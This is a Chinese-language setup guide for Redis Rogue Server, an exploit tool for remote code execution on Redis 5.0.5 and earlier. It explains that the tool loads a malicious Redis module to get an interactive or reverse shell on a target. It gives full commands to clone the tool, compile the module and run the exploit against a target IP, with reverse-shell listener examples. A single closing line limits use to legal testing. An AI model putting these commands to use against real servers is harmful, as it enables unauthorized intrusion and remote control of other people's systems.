Redis Rogue Server 安装和配置指南
redis-rogue-server Redis(<=5.0.5) RCE 项目地址: https://gitcode.com/gh_mirrors/re/redis-rogue-server
1. 项目基础介绍和主要的编程语言
项目基础介绍
Redis Rogue Server 是一个用于 Redis 远程代码执行(RCE)的漏洞利用工具。它支持 Redis 版本 5.0.5 及以下,允许攻击者通过该工具获取目标 Redis 服务器的交互式 shell 或反向 shell。
主要的编程语言
该项目主要使用 Python 编写,同时也包含一些 C 和 C++ 代码用于编译 Redis 模块。
2. 项目使用的关键技术和框架
关键技术
- Redis 模块加载:利用 Redis 的模块加载功能执行恶意代码。
- 交互式 shell 和反向 shell:支持与目标 Redis 服务器的交互式 shell 和反向 shell 连接。
框架
- Python 3.6+:用于编写主要的漏洞利用脚本。
- Makefile:用于编译 Redis 模块。
3. 项目安装和配置的准备工作和详细的安装步骤
准备工作
- 操作系统:建议在 Linux 或 macOS 系统上进行安装和配置。
- Python 3.6+:确保系统中已安装 Python 3.6 或更高版本。
- Git:用于克隆项目代码。
- Make:用于编译 Redis 模块(可选,如果需要修改或重新编译模块)。
安装步骤
步骤 1:克隆项目代码
首先,使用 Git 克隆项目代码到本地:
git clone https://github.com/n0b0dyCN/redis-rogue-server.git
步骤 2:进入项目目录
进入克隆下来的项目目录:
cd redis-rogue-server
步骤 3:编译 Redis 模块(可选)
如果你需要修改或重新编译 Redis 模块,可以使用以下命令:
cd RedisModulesSDK/exp/
make
编译完成后,将生成的 .so
文件复制到 redis-rogue-server.py
所在的目录。
步骤 4:运行漏洞利用脚本
使用以下命令运行漏洞利用脚本:
python3 redis-rogue-server.py --rhost <目标Redis服务IP> --rport <目标Redis服务端口> --lhost <本地IP> --lport <本地监听端口>
例如:
python3 redis-rogue-server.py --rhost 192.168.1.100 --rport 6379 --lhost 192.168.1.2 --lport 21000
参数说明
--rhost
:目标 Redis 服务的 IP 地址。--rport
:目标 Redis 服务的端口,默认为 6379。--lhost
:本地 IP 地址,用于监听反向 shell 连接。--lport
:本地监听端口,默认为 21000。
使用示例
- 交互式 shell:
python3 redis-rogue-server.py --rhost 192.168.1.100 --lhost 192.168.1.2
- 反向 shell:
python3 redis-rogue-server.py --rhost 192.168.1.100 --lhost 192.168.1.2 --lport 9999
总结
通过以上步骤,你可以成功安装和配置 Redis Rogue Server,并利用它对目标 Redis 服务器进行漏洞利用。请注意,该工具仅用于合法的安全测试和研究目的。
redis-rogue-server Redis(<=5.0.5) RCE 项目地址: https://gitcode.com/gh_mirrors/re/redis-rogue-server